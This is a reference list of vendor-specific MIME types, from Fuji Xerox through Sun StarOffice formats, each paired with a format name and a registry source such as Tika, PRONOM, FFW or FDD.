application/vnd.fujixerox.dddapplication/vnd.fujixerox.ddd tika
application/vnd.fujixerox.docuworksapplication/vnd.fujixerox.docuworks tika
application/vnd.fujixerox.docuworks.binderapplication/vnd.fujixerox.docuworks.binder tika
application/vnd.fujixerox.hbplapplication/vnd.fujixerox.hbpl tika
application/vnd.fut-misnetapplication/vnd.fut-misnet tika
application/vnd.fuzzysheetapplication/vnd.fuzzysheet tika
application/vnd.genomatix.tuxedoapplication/vnd.genomatix.tuxedo tika
application/vnd.geo+jsonGeoJSON ffw
application/vnd.geogebra.fileGgb ffw
application/vnd.geogebra.file tika
—  application/vnd.geogebra.file; version=”1.0″GeoGebra 1.0 pronom
—  application/vnd.geogebra.file; version=”1.x”GeoGebra 1.x pronom
—  application/vnd.geogebra.file; version=”2″GeoGebra 2 pronom
—  application/vnd.geogebra.file; version=”3″GeoGebra 3 pronom
—  application/vnd.geogebra.file; version=”4″GeoGebra 4 pronom
—  application/vnd.geogebra.file; version=”5″GeoGebra 5 pronom
application/vnd.geogebra.toolapplication/vnd.geogebra.tool tika
application/vnd.geometry-explorerapplication/vnd.geometry-explorer tika
application/vnd.gerberGerber format ffw
Gerber Format pronom
application/vnd.gmxapplication/vnd.gmx tika
application/vnd.grafeqapplication/vnd.grafeq tika
application/vnd.gridmpapplication/vnd.gridmp tika
application/vnd.groove-accountapplication/vnd.groove-account tika
application/vnd.groove-helpapplication/vnd.groove-help tika
application/vnd.groove-identity-messageapplication/vnd.groove-identity-message tika
application/vnd.groove-injectorapplication/vnd.groove-injector tika
application/vnd.groove-tool-messageapplication/vnd.groove-tool-message tika
application/vnd.groove-tool-templateapplication/vnd.groove-tool-template tika
application/vnd.groove-vcardapplication/vnd.groove-vcard tika
application/vnd.handheld-entertainment+xmlapplication/vnd.handheld-entertainment+xml tika
application/vnd.hbciapplication/vnd.hbci tika
application/vnd.hcl-bireportsapplication/vnd.hcl-bireports tika
application/vnd.hhe.lesson-playerapplication/vnd.hhe.lesson-player tika
application/vnd.hp-hpglapplication/vnd.hp-hpgl tika
Hewlett Packard Graphics Language pronom
application/vnd.hp-hpidapplication/vnd.hp-hpid tika
application/vnd.hp-hpsapplication/vnd.hp-hps tika
application/vnd.hp-jlytapplication/vnd.hp-jlyt tika
application/vnd.hp-pclPCL ffw
application/vnd.hp-pcl tika
application/vnd.hp-pclxlPCL ffw
application/vnd.hp-pclxl tika
application/vnd.httphoneapplication/vnd.httphone tika
application/vnd.hydrostatix.sof-dataapplication/vnd.hydrostatix.sof-data tika
application/vnd.hzn-3d-crosswordapplication/vnd.hzn-3d-crossword tika
application/vnd.ibm.afplinedataapplication/vnd.ibm.afplinedata tika
application/vnd.ibm.electronic-mediaapplication/vnd.ibm.electronic-media tika
application/vnd.ibm.minipayapplication/vnd.ibm.minipay tika
application/vnd.ibm.modcapapplication/vnd.ibm.modcap tika
application/vnd.ibm.rights-managementapplication/vnd.ibm.rights-management tika
application/vnd.ibm.secure-containerapplication/vnd.ibm.secure-container tika
application/vnd.iccprofileapplication/vnd.iccprofile tika
application/vnd.igloaderapplication/vnd.igloader tika
application/vnd.immervision-ivpapplication/vnd.immervision-ivp tika
application/vnd.immervision-ivuapplication/vnd.immervision-ivu tika
application/vnd.informedcontrol.rms+xmlapplication/vnd.informedcontrol.rms+xml tika
application/vnd.informix-visionaryapplication/vnd.informix-visionary tika
application/vnd.intercon.formnetapplication/vnd.intercon.formnet tika
application/vnd.intertrust.digiboxapplication/vnd.intertrust.digibox tika
application/vnd.intertrust.nncpapplication/vnd.intertrust.nncp tika
application/vnd.intu.qboapplication/vnd.intu.qbo tika
application/vnd.intu.qfxapplication/vnd.intu.qfx tika
application/vnd.iptc.g2.conceptitem+xmlapplication/vnd.iptc.g2.conceptitem+xml tika
application/vnd.iptc.g2.knowledgeitem+xmlapplication/vnd.iptc.g2.knowledgeitem+xml tika
application/vnd.iptc.g2.newsitem+xmlapplication/vnd.iptc.g2.newsitem+xml tika
application/vnd.iptc.g2.packageitem+xmlapplication/vnd.iptc.g2.packageitem+xml tika
application/vnd.ipunplugged.rcprofileapplication/vnd.ipunplugged.rcprofile tika
application/vnd.irepository.package+xmlapplication/vnd.irepository.package+xml tika
application/vnd.is-xprapplication/vnd.is-xpr tika
application/vnd.jamapplication/vnd.jam tika
application/vnd.japannet-directory-serviceapplication/vnd.japannet-directory-service tika
application/vnd.japannet-jpnstore-wakeupapplication/vnd.japannet-jpnstore-wakeup tika
application/vnd.japannet-payment-wakeupapplication/vnd.japannet-payment-wakeup tika
application/vnd.japannet-registrationapplication/vnd.japannet-registration tika
application/vnd.japannet-registration-wakeupapplication/vnd.japannet-registration-wakeup tika
application/vnd.japannet-setstore-wakeupapplication/vnd.japannet-setstore-wakeup tika
application/vnd.japannet-verificationapplication/vnd.japannet-verification tika
application/vnd.japannet-verification-wakeupapplication/vnd.japannet-verification-wakeup tika
application/vnd.jcp.javame.midlet-rmsapplication/vnd.jcp.javame.midlet-rms tika
application/vnd.jispapplication/vnd.jisp tika
application/vnd.joost.joda-archiveapplication/vnd.joost.joda-archive tika
application/vnd.kahootzapplication/vnd.kahootz tika
application/vnd.kde.karbonapplication/vnd.kde.karbon tika
application/vnd.kde.kchartKChart File tika
application/vnd.kde.kformulaapplication/vnd.kde.kformula tika
application/vnd.kde.kivioapplication/vnd.kde.kivio tika
application/vnd.kde.kontourapplication/vnd.kde.kontour tika
application/vnd.kde.kpresenterKPresenter File tika
application/vnd.kde.kspreadKSpread File tika
application/vnd.kde.kwordKWord File tika
application/vnd.kenameaappapplication/vnd.kenameaapp tika
application/vnd.kidspirationapplication/vnd.kidspiration tika
application/vnd.kinarapplication/vnd.kinar tika
application/vnd.koanSSEYO Koan File tika
application/vnd.kodak-descriptorapplication/vnd.kodak-descriptor tika
application/vnd.lasLAS (LASer) File Format, Version 1.4 fdd
application/vnd.liberty-request+xmlapplication/vnd.liberty-request+xml tika
application/vnd.llamagraphics.life-balance.desktopapplication/vnd.llamagraphics.life-balance.desktop tika
application/vnd.llamagraphics.life-balance.exchange+xmlapplication/vnd.llamagraphics.life-balance.exchange+xml tika
application/vnd.lotus-1-2-3Lotus 1-2-3 ffw
application/vnd.lotus-1-2-3 tika
—  application/vnd.lotus-1-2-3; version=”1.0″Lotus 1-2-3 Worksheet 1.0 pronom
—  application/vnd.lotus-1-2-3; version=”2.0″Lotus 1-2-3 Worksheet 2.0 pronom
—  application/x-123; version=”1.0″Lotus 1-2-3 Worksheet 1.0 pronom
—  application/x-123; version=”2.0″Lotus 1-2-3 Worksheet 2.0 pronom
application/vnd.lotus-1-2-3; version=”3.0″Lotus 1-2-3 Worksheet 3.0 pronom
application/vnd.lotus-1-2-3; version=”4-5″Lotus 1-2-3 Worksheet 4-5 pronom
application/vnd.lotus-approachapplication/vnd.lotus-approach tika
Lotus Approach View File pronom
—  application/vnd.lotus-approach; version=”97″Lotus Approach View File 97 pronom
application/vnd.lotus-freelanceapplication/vnd.lotus-freelance tika
Lotus Freelance Smartmaster Graphics pronom
application/vnd.lotus-notesNotes Storage Facility ffw
application/vnd.lotus-notes tika
Lotus Notes Storage Facility fdd
—  application/vnd.lotus-notes; version=”2″Lotus Notes Database 2 pronom
—  application/vnd.lotus-notes; version=”3″Lotus Notes Database 3 pronom
—  application/vnd.lotus-notes; version=”4″Lotus Notes Database 4 pronom
application/vnd.lotus-organizerapplication/vnd.lotus-organizer tika
application/vnd.lotus-screencamapplication/vnd.lotus-screencam tika
application/vnd.lotus-wordproLotus Word Pro ffw
application/vnd.lotus-wordpro tika
AMI Professional Document pronom
application/vnd.lotus-wordpro; version=”96″Lotus WordPro Document 96 pronom
application/vnd.lotus-wordpro; version=”97/millennium”Lotus WordPro Document 97/Millennium pronom
application/vnd.macports.portpkgapplication/vnd.macports.portpkg tika
application/vnd.makemusic.notationFinale ffw
application/vnd.marlin.drm.actiontoken+xmlapplication/vnd.marlin.drm.actiontoken+xml tika
application/vnd.marlin.drm.conftoken+xmlapplication/vnd.marlin.drm.conftoken+xml tika
application/vnd.marlin.drm.license+xmlapplication/vnd.marlin.drm.license+xml tika
application/vnd.marlin.drm.mdcfapplication/vnd.marlin.drm.mdcf tika
application/vnd.mcdapplication/vnd.mcd tika
application/vnd.medcalcdataapplication/vnd.medcalcdata tika
application/vnd.mediastation.cdkeyapplication/vnd.mediastation.cdkey tika
application/vnd.meridian-slingshotapplication/vnd.meridian-slingshot tika
application/vnd.mferapplication/vnd.mfer tika
application/vnd.mfmpapplication/vnd.mfmp tika
application/vnd.micrografx.floapplication/vnd.micrografx.flo tika
application/vnd.micrografx.igxapplication/vnd.micrografx.igx tika
application/vnd.mifMaker Interchange Format ffw
FrameMaker Interchange Format tika
Adobe FrameMaker Interchange Format pronom
application/vnd.minisoft-hp3000-saveapplication/vnd.minisoft-hp3000-save tika
application/vnd.mitsubishi.misty-guard.trustwebapplication/vnd.mitsubishi.misty-guard.trustweb tika
application/vnd.mobius.dafapplication/vnd.mobius.daf tika
application/vnd.mobius.disapplication/vnd.mobius.dis tika
application/vnd.mobius.mbkapplication/vnd.mobius.mbk tika
application/vnd.mobius.mqyapplication/vnd.mobius.mqy tika
application/vnd.mobius.mslapplication/vnd.mobius.msl tika
application/vnd.mobius.plcapplication/vnd.mobius.plc tika
application/vnd.mobius.txfapplication/vnd.mobius.txf tika
application/vnd.mophun.applicationapplication/vnd.mophun.application tika
application/vnd.mophun.certificateapplication/vnd.mophun.certificate tika
application/vnd.motorola.flexsuiteapplication/vnd.motorola.flexsuite tika
application/vnd.motorola.flexsuite.adsiapplication/vnd.motorola.flexsuite.adsi tika
application/vnd.motorola.flexsuite.fisapplication/vnd.motorola.flexsuite.fis tika
application/vnd.motorola.flexsuite.gotapapplication/vnd.motorola.flexsuite.gotap tika
application/vnd.motorola.flexsuite.kmrapplication/vnd.motorola.flexsuite.kmr tika
application/vnd.motorola.flexsuite.ttcapplication/vnd.motorola.flexsuite.ttc tika
application/vnd.motorola.flexsuite.wemapplication/vnd.motorola.flexsuite.wem tika
application/vnd.motorola.iprmapplication/vnd.motorola.iprm tika
application/vnd.mozilla.xul+xmlapplication/vnd.mozilla.xul+xml tika
application/vnd.ms-artgalryapplication/vnd.ms-artgalry tika
application/vnd.ms-asfASF ffw
application/vnd.ms-asf tika
Advanced Systems Format pronom
ASF (Advanced Systems Format) fdd
application/vnd.ms-cab-compressedCabinet ffw
application/vnd.ms-cab-compressed tika
application/vnd.ms-excel.addin.macroenabled.12; version=”2007″Microsoft Excel Macro-Enabled Add-In 2007 pronom
application/vnd.ms-excel.sheet.binary.macroenabled.12; version=”2007 onwards”Microsoft Excel Non-XML Binary Workbook 2007 onwards pronom
application/vnd.ms-excel.sheet.macroenabled.12; version=”2007″Microsoft Excel Macro-Enabled 2007 pronom
application/vnd.ms-excel.template.macroenabled.12; version=”2007″Microsoft Excel Macro-Enabled Template 2007 pronom
application/vnd.ms-fontobjectEmbedded OpenType ffw
application/vnd.ms-fontobject tika
application/vnd.ms-htmlhelpCHM ffw
application/vnd.ms-htmlhelp tika
Microsoft Compiled HTML Help pronom
application/vnd.ms-imsapplication/vnd.ms-ims tika
application/vnd.ms-lrmapplication/vnd.ms-lrm tika
application/vnd.ms-officethemeMicrosoft Office Theme pronom
application/vnd.ms-outlook-pstOutlook Personal Folders File Format tika
application/vnd.ms-package.3dmanufacturing-3dmodel+xml3MF ffw
3MF 3D Manufacturing Format pronom
application/vnd.ms-pki.seccatapplication/vnd.ms-pki.seccat tika
application/vnd.ms-pki.stlapplication/vnd.ms-pki.stl tika
application/vnd.ms-playready.initiator+xmlapplication/vnd.ms-playready.initiator+xml tika
application/vnd.ms-powerpoint.addin.macroenabled.12; version=”2007″Microsoft PowerPoint Macro-Enabled Add-In 2007 pronom
application/vnd.ms-powerpoint.presentation.macroenabled.12; version=”2007 onwards”Macro Enabled Microsoft Powerpoint 2007 Onwards pronom
application/vnd.ms-powerpoint.slide.macroenabled.12; version=”2007″Microsoft PowerPoint Macro-Enabled Slide 2007 pronom
application/vnd.ms-powerpoint.slideshow.macroenabled.12; version=”2007″Microsoft PowerPoint Macro-Enabled Show 2007 pronom
application/vnd.ms-powerpoint.template.macroenabled.12; version=”2007″Microsoft PowerPoint Macro-Enabled Template 2007 pronom
application/vnd.ms-printing.printticket+xml3MF ffw
application/vnd.ms-tnefTransport Neutral Encapsulation Format ffw
application/vnd.ms-tnef tika
application/vnd.ms-visio.drawing.macroenabled.main+xml; version=”2013″Microsoft Visio Macro-Enabled Drawing 2013 pronom
application/vnd.ms-visio.drawing.main+xml; version=”2013″Microsoft Visio Drawing 2013 pronom
application/vnd.ms-visio.stencil.macroenabled.main+xml; version=”2013″Microsoft Visio Macro-Enabled Stencil 2013 pronom
application/vnd.ms-visio.stencil.main+xml; version=”2013″Microsoft Visio Stencil 2013 pronom
application/vnd.ms-visio.template.macroenabled.main+xml; version=”2013″Microsoft Visio Macro-Enabled Template 2013 pronom
application/vnd.ms-visio.template.main+xml; version=”2013″Microsoft Visio Template 2013 pronom
application/vnd.ms-wmdrm.lic-chlg-reqapplication/vnd.ms-wmdrm.lic-chlg-req tika
application/vnd.ms-wmdrm.lic-respapplication/vnd.ms-wmdrm.lic-resp tika
application/vnd.ms-wmdrm.meter-chlg-reqapplication/vnd.ms-wmdrm.meter-chlg-req tika
application/vnd.ms-wmdrm.meter-respapplication/vnd.ms-wmdrm.meter-resp tika
application/vnd.ms-word.document.macroenabled.12; version=”2007 onwards”Macro enabled Microsoft Word Document OOXML 2007 Onwards pronom
application/vnd.ms-word.template.macroenabled.12; version=”2007 onwards”Microsoft Word Macro-Enabled Document Template 2007 onwards pronom
application/vnd.ms-wplapplication/vnd.ms-wpl tika
Windows Media Playlist pronom
application/vnd.mseqapplication/vnd.mseq tika
application/vnd.msignapplication/vnd.msign tika
application/vnd.multiad.creatorapplication/vnd.multiad.creator tika
application/vnd.multiad.creator.cifapplication/vnd.multiad.creator.cif tika
application/vnd.music-niffapplication/vnd.music-niff tika
Notation Interchange File Format pronom
application/vnd.musicianapplication/vnd.musician tika
application/vnd.muvee.styleapplication/vnd.muvee.style tika
application/vnd.ncd.controlapplication/vnd.ncd.control tika
application/vnd.ncd.referenceapplication/vnd.ncd.reference tika
application/vnd.nervanaapplication/vnd.nervana tika
application/vnd.netfpxapplication/vnd.netfpx tika
application/vnd.neurolanguage.nluapplication/vnd.neurolanguage.nlu tika
application/vnd.nitfNational Imagery Transmission Format ffw
—  application/vnd.nitf; version=”1.0″National Imagery Transmission Format 1.0 pronom
—  application/vnd.nitf; version=”2.0″National Imagery Transmission Format 2.0 pronom
—  application/vnd.nitf; version=”2.1″National Imagery Transmission Format 2.1 pronom
application/vnd.noblenet-directoryapplication/vnd.noblenet-directory tika
application/vnd.noblenet-sealerapplication/vnd.noblenet-sealer tika
application/vnd.noblenet-webapplication/vnd.noblenet-web tika
application/vnd.nokia.catalogsapplication/vnd.nokia.catalogs tika
application/vnd.nokia.conml+wbxmlapplication/vnd.nokia.conml+wbxml tika
application/vnd.nokia.conml+xmlapplication/vnd.nokia.conml+xml tika
application/vnd.nokia.iptv.config+xmlapplication/vnd.nokia.iptv.config+xml tika
application/vnd.nokia.isds-radio-presetsapplication/vnd.nokia.isds-radio-presets tika
application/vnd.nokia.landmark+wbxmlapplication/vnd.nokia.landmark+wbxml tika
application/vnd.nokia.landmark+xmlapplication/vnd.nokia.landmark+xml tika
application/vnd.nokia.landmarkcollection+xmlapplication/vnd.nokia.landmarkcollection+xml tika
application/vnd.nokia.n-gage.ac+xmlapplication/vnd.nokia.n-gage.ac+xml tika
application/vnd.nokia.n-gage.dataapplication/vnd.nokia.n-gage.data tika
application/vnd.nokia.n-gage.symbian.installapplication/vnd.nokia.n-gage.symbian.install tika
application/vnd.nokia.ncdapplication/vnd.nokia.ncd tika
application/vnd.nokia.pcd+wbxmlapplication/vnd.nokia.pcd+wbxml tika
application/vnd.nokia.pcd+xmlapplication/vnd.nokia.pcd+xml tika
application/vnd.nokia.radio-presetapplication/vnd.nokia.radio-preset tika
application/vnd.nokia.radio-presetsapplication/vnd.nokia.radio-presets tika
application/vnd.novadigm.edmapplication/vnd.novadigm.edm tika
application/vnd.novadigm.edxapplication/vnd.novadigm.edx tika
application/vnd.novadigm.extapplication/vnd.novadigm.ext tika
application/vnd.oasis.opendocument.baseOpenDocument ffw
application/vnd.oasis.opendocument.chartOpenDocument ffw
OpenDocument v1.0: Chart document tika
OpenDocument Chart Document Format (ODC), Version 1.2, ISO 26300-1:2015 fdd
application/vnd.oasis.opendocument.chart-templateOpenDocument ffw
OpenDocument v1.0: Chart document used as template tika
OpenDocument Chart Document Format (ODC), Version 1.2, ISO 26300-1:2015 fdd
application/vnd.oasis.opendocument.databaseOpenDocument ffw
application/vnd.oasis.opendocument.database tika
OpenDocument Database Front End Document Format (ODB), Version 1.2, ISO 26300-1:2015 fdd
application/vnd.oasis.opendocument.formula-templateOpenDocument ffw
OpenDocument v1.0: Formula document used as template tika
application/vnd.oasis.opendocument.graphicsOpenDocument ffw
OpenDocument Drawing ffw
OpenDocument v1.0: Graphics document (Drawing) tika
OpenDocument Drawing Document Format (ODG), Version 1.2, ISO 26300-1:2015 fdd
—  application/vnd.oasis.opendocument.graphics; version=”1.0″OpenDocument Graphics 1.0 pronom
—  application/vnd.oasis.opendocument.graphics; version=”1.1″OpenDocument Graphics 1.1 pronom
—  application/vnd.oasis.opendocument.graphics; version=”1.2″OpenDocument Graphics 1.2 pronom
application/vnd.oasis.opendocument.graphics-templateOpenDocument ffw
OpenDocument Drawing ffw
OpenDocument v1.0: Graphics document used as template tika
OpenDocument Drawing Document Format (ODG), Version 1.2, ISO 26300-1:2015 fdd
application/vnd.oasis.opendocument.imageOpenDocument ffw
OpenDocument v1.0: Image document tika
application/vnd.oasis.opendocument.image-templateOpenDocument ffw
OpenDocument v1.0: Image document used as template tika
application/vnd.oasis.opendocument.presentationOpenDocument ffw
OpenDocument Presentation ffw
OpenDocument v1.0: Presentation document tika
OpenDocument Presentation Document Format (ODP), Version 1.2, ISO 26300-1:2015 fdd
—  application/vnd.oasis.opendocument.presentation; version=”1.0″OpenDocument Presentation 1.0 pronom
—  application/vnd.oasis.opendocument.presentation; version=”1.1″OpenDocument Presentation 1.1 pronom
—  application/vnd.oasis.opendocument.presentation; version=”1.2″OpenDocument Presentation 1.2 pronom
application/vnd.oasis.opendocument.presentation-templateOpenDocument ffw
OpenDocument Presentation ffw
OpenDocument v1.0: Presentation document used as template tika
OpenDocument Presentation Document Format (ODP), Version 1.2, ISO 26300-1:2015 fdd
application/vnd.oasis.opendocument.spreadsheetOpenDocument Spreadsheet ffw
OpenDocument ffw
OpenDocument v1.0: Spreadsheet document tika
OpenDocument Spreadsheet Document Format (ODS), Version 1.1, ISO 26300:2006 fdd
OpenDocument Spreadsheet Document Format (ODS), Version 1.2, ISO 26300:2015 fdd
—  application/vnd.oasis.opendocument.spreadsheet; version=”1.0″OpenDocument Spreadsheet 1.0 pronom
—  application/vnd.oasis.opendocument.spreadsheet; version=”1.1″OpenDocument Spreadsheet 1.1 pronom
—  application/vnd.oasis.opendocument.spreadsheet; version=”1.2″OpenDocument Spreadsheet 1.2 pronom
application/vnd.oasis.opendocument.spreadsheet-templateOpenDocument Spreadsheet ffw
OpenDocument ffw
OpenDocument v1.0: Spreadsheet document used as template tika
OpenDocument Spreadsheet Document Format (ODS), Version 1.1, ISO 26300:2006 fdd
OpenDocument Spreadsheet Document Format (ODS), Version 1.2, ISO 26300:2015 fdd
application/vnd.oasis.opendocument.textOpenDocument ffw
OpenDocument Text ffw
OpenDocument v1.0: Text document tika
OpenDocument Text Document Format (ODT), Version 1.1, ISO/IEC 26300:2006 fdd
OpenDocument Text Document Format (ODT), Version 1.2, ISO 26300-1:2015 fdd
—  application/vnd.oasis.opendocument.text; version=”1.0″OpenDocument Text 1.0 pronom
—  application/vnd.oasis.opendocument.text; version=”1.1″OpenDocument Text 1.1 pronom
—  application/vnd.oasis.opendocument.text; version=”1.2″OpenDocument Text 1.2 pronom
application/vnd.oasis.opendocument.text-masterOpenDocument ffw
OpenDocument v1.0: Global Text document tika
OpenDocument Text Document Format (ODT), Version 1.2, ISO 26300-1:2015 fdd
application/vnd.oasis.opendocument.text-templateOpenDocument ffw
OpenDocument Text ffw
OpenDocument v1.0: Text document used as template tika
OpenDocument Text Document Format (ODT), Version 1.2, ISO 26300-1:2015 fdd
application/vnd.oasis.opendocument.text-webOpenDocument ffw
OpenDocument v1.0: Text document used as template for HTML documents tika
application/vnd.obnapplication/vnd.obn tika
application/vnd.olpc-sugarapplication/vnd.olpc-sugar tika
application/vnd.oma-scws-configapplication/vnd.oma-scws-config tika
application/vnd.oma-scws-http-requestapplication/vnd.oma-scws-http-request tika
application/vnd.oma-scws-http-responseapplication/vnd.oma-scws-http-response tika
application/vnd.oma.bcast.associated-procedure-parameter+xmlapplication/vnd.oma.bcast.associated-procedure-parameter+xml tika
application/vnd.oma.bcast.drm-trigger+xmlapplication/vnd.oma.bcast.drm-trigger+xml tika
application/vnd.oma.bcast.imd+xmlapplication/vnd.oma.bcast.imd+xml tika
application/vnd.oma.bcast.ltkmapplication/vnd.oma.bcast.ltkm tika
application/vnd.oma.bcast.notification+xmlapplication/vnd.oma.bcast.notification+xml tika
application/vnd.oma.bcast.provisioningtriggerapplication/vnd.oma.bcast.provisioningtrigger tika
application/vnd.oma.bcast.sgbootapplication/vnd.oma.bcast.sgboot tika
application/vnd.oma.bcast.sgdd+xmlapplication/vnd.oma.bcast.sgdd+xml tika
application/vnd.oma.bcast.sgduapplication/vnd.oma.bcast.sgdu tika
application/vnd.oma.bcast.simple-symbol-containerapplication/vnd.oma.bcast.simple-symbol-container tika
application/vnd.oma.bcast.smartcard-trigger+xmlapplication/vnd.oma.bcast.smartcard-trigger+xml tika
application/vnd.oma.bcast.sprov+xmlapplication/vnd.oma.bcast.sprov+xml tika
application/vnd.oma.bcast.stkmapplication/vnd.oma.bcast.stkm tika
application/vnd.oma.dcdapplication/vnd.oma.dcd tika
application/vnd.oma.dcdcapplication/vnd.oma.dcdc tika
application/vnd.oma.dd2+xmlapplication/vnd.oma.dd2+xml tika
application/vnd.oma.drm.risd+xmlapplication/vnd.oma.drm.risd+xml tika
application/vnd.oma.group-usage-list+xmlapplication/vnd.oma.group-usage-list+xml tika
application/vnd.oma.poc.detailed-progress-report+xmlapplication/vnd.oma.poc.detailed-progress-report+xml tika
application/vnd.oma.poc.final-report+xmlapplication/vnd.oma.poc.final-report+xml tika
application/vnd.oma.poc.groups+xmlapplication/vnd.oma.poc.groups+xml tika
application/vnd.oma.poc.invocation-descriptor+xmlapplication/vnd.oma.poc.invocation-descriptor+xml tika
application/vnd.oma.poc.optimized-progress-report+xmlapplication/vnd.oma.poc.optimized-progress-report+xml tika
application/vnd.oma.xcap-directory+xmlapplication/vnd.oma.xcap-directory+xml tika
application/vnd.omads-email+xmlapplication/vnd.omads-email+xml tika
application/vnd.omads-file+xmlapplication/vnd.omads-file+xml tika
application/vnd.omads-folder+xmlapplication/vnd.omads-folder+xml tika
application/vnd.omaloc-supl-initapplication/vnd.omaloc-supl-init tika
application/vnd.openofficeorg.extensionapplication/vnd.openofficeorg.extension tika
application/vnd.openxmlformats-officedocument.presentationml.documentOOXML Format Family — ISO/IEC 29500 and ECMA 376 fdd
application/vnd.openxmlformats-officedocument.spreadsheetml.documentOOXML Format Family — ISO/IEC 29500 and ECMA 376 fdd
application/vnd.osa.netdeployapplication/vnd.osa.netdeploy tika
application/vnd.osgi.bundleapplication/vnd.osgi.bundle tika
application/vnd.osgi.dpapplication/vnd.osgi.dp tika
application/vnd.otps.ct-kip+xmlapplication/vnd.otps.ct-kip+xml tika
application/vnd.pagemakerPagemaker Document (Generic) pronom
application/vnd.palmPalm OS Database ffw
PRC (Palm OS) ffw
application/vnd.palm tika
application/vnd.paos.xmlapplication/vnd.paos.xml tika
application/vnd.pdfPDF (Portable Document Format) Family fdd
application/vnd.pg.formatapplication/vnd.pg.format tika
application/vnd.pg.osasliapplication/vnd.pg.osasli tika
application/vnd.piaccess.application-licenceapplication/vnd.piaccess.application-licence tika
application/vnd.picselapplication/vnd.picsel tika
application/vnd.poc.group-advertisement+xmlapplication/vnd.poc.group-advertisement+xml tika
application/vnd.pocketlearnapplication/vnd.pocketlearn tika
application/vnd.powerbuilder6application/vnd.powerbuilder6 tika
application/vnd.powerbuilder6-sapplication/vnd.powerbuilder6-s tika
application/vnd.powerbuilder7application/vnd.powerbuilder7 tika
application/vnd.powerbuilder7-sapplication/vnd.powerbuilder7-s tika
application/vnd.powerbuilder75application/vnd.powerbuilder75 tika
application/vnd.powerbuilder75-sapplication/vnd.powerbuilder75-s tika
application/vnd.preminetapplication/vnd.preminet tika
application/vnd.previewsystems.boxapplication/vnd.previewsystems.box tika
application/vnd.proteus.magazineapplication/vnd.proteus.magazine tika
application/vnd.publishare-delta-treeapplication/vnd.publishare-delta-tree tika
application/vnd.pvi.ptid1application/vnd.pvi.ptid1 tika
application/vnd.pwg-multiplexedapplication/vnd.pwg-multiplexed tika
application/vnd.pwg-xhtml-print+xmlapplication/vnd.pwg-xhtml-print+xml tika
application/vnd.qualcomm.brew-app-resapplication/vnd.qualcomm.brew-app-res tika
application/vnd.quark.quarkxpressQuarkXPress ffw
application/vnd.quark.quarkxpress tika
Quark Xpress Data File pronom
Quark Xpress Report File pronom
application/vnd.quark.quarkxpress; version=”10″Quark Xpress Data File 10 pronom
application/vnd.quark.quarkxpress; version=”6″Quark Xpress Data File 6 pronom
application/vnd.quark.quarkxpress; version=”9″Quark Xpress Data File 9 pronom
application/vnd.rapidapplication/vnd.rapid tika
application/vnd.rarRAR ffw
RAR Archive File Format Family fdd
—  application/vnd.rar; version=”2.0″RAR Archive 2.0 pronom
—  application/vnd.rar; version=”2.9″RAR Archive 2.9 pronom
—  application/vnd.rar; version=”5.0″RAR Archive 5.0 pronom
application/vnd.recordare.musicxmlapplication/vnd.recordare.musicxml tika
Compressed Music XML pronom
application/vnd.recordare.musicxml+xmlapplication/vnd.recordare.musicxml+xml tika
Music XML pronom
MusicXML, Version 3.0 fdd
MusicXML File Format Family fdd
MusicXML, Version 3.1 fdd
application/vnd.renlearn.rlprintapplication/vnd.renlearn.rlprint tika
application/vnd.rim.codapplication/vnd.rim.cod tika
application/vnd.rn-realmediaRealMedia ffw
application/vnd.rn-realmedia tika
RealMedia pronom
RealVideo, Version 10 fdd
RealAudio, Version 10 fdd
application/vnd.route66.link66+xmlapplication/vnd.route66.link66+xml tika
application/vnd.ruckus.downloadapplication/vnd.ruckus.download tika
application/vnd.s3smsapplication/vnd.s3sms tika
application/vnd.sbm.cidapplication/vnd.sbm.cid tika
application/vnd.sbm.mid2application/vnd.sbm.mid2 tika
application/vnd.scribusScribus ffw
application/vnd.scribus tika
application/vnd.sealed.3dfapplication/vnd.sealed.3df tika
application/vnd.sealed.csfapplication/vnd.sealed.csf tika
application/vnd.sealed.docapplication/vnd.sealed.doc tika
application/vnd.sealed.emlapplication/vnd.sealed.eml tika
application/vnd.sealed.mhtapplication/vnd.sealed.mht tika
application/vnd.sealed.netapplication/vnd.sealed.net tika
application/vnd.sealed.pptapplication/vnd.sealed.ppt tika
application/vnd.sealed.tiffapplication/vnd.sealed.tiff tika
application/vnd.sealed.xlsapplication/vnd.sealed.xls tika
application/vnd.sealedmedia.softseal.htmlapplication/vnd.sealedmedia.softseal.html tika
application/vnd.sealedmedia.softseal.pdfapplication/vnd.sealedmedia.softseal.pdf tika
application/vnd.seemailapplication/vnd.seemail tika
application/vnd.semaapplication/vnd.sema tika
application/vnd.semdapplication/vnd.semd tika
application/vnd.semfapplication/vnd.semf tika
application/vnd.shana.informed.formdataapplication/vnd.shana.informed.formdata tika
application/vnd.shana.informed.formtemplateapplication/vnd.shana.informed.formtemplate tika
application/vnd.shana.informed.interchangeapplication/vnd.shana.informed.interchange tika
application/vnd.shana.informed.packageapplication/vnd.shana.informed.package tika
application/vnd.simtech-mindmapperapplication/vnd.simtech-mindmapper tika
application/vnd.smafapplication/vnd.smaf tika
application/vnd.smart.teacherapplication/vnd.smart.teacher tika
application/vnd.software602.filler.form+xmlapplication/vnd.software602.filler.form+xml tika
application/vnd.software602.filler.form-xml-zipapplication/vnd.software602.filler.form-xml-zip tika
application/vnd.solent.sdkm+xmlapplication/vnd.solent.sdkm+xml tika
application/vnd.spotfire.dxpapplication/vnd.spotfire.dxp tika
application/vnd.spotfire.sfsapplication/vnd.spotfire.sfs tika
application/vnd.sqlite3SQLite ffw
application/vnd.sss-codapplication/vnd.sss-cod tika
application/vnd.sss-dtfapplication/vnd.sss-dtf tika
application/vnd.sss-ntfapplication/vnd.sss-ntf tika
application/vnd.stardivision.chartStarOffice binary formats ffw
application/vnd.stardivision.impress-packedStarOffice binary formats ffw
application/vnd.stardivision.mailStarOffice binary formats ffw
application/vnd.stardivision.mathStarOffice binary formats ffw
application/vnd.stardivision.math tika
application/vnd.stardivision.writer-globalStarOffice binary formats ffw
application/vnd.stardivision.writer-global tika
application/vnd.street-streamapplication/vnd.street-stream tika
application/vnd.sun.wadl+xmlapplication/vnd.sun.wadl+xml tika
application/vnd.sun.xml.calcOpenOffice.org XML ffw
application/vnd.sun.xml.calc tika
—  application/vnd.sun.xml.calc; version=”1.0″OpenOffice Calc 1.0 pronom
application/vnd.sun.xml.calc.templateOpenOffice.org XML ffw
application/vnd.sun.xml.calc.template tika
application/vnd.sun.xml.drawOpenOffice.org XML ffw
SXD ffw
application/vnd.sun.xml.draw tika
—  application/vnd.sun.xml.draw; version=”1.0″OpenOffice Draw 1.0 pronom
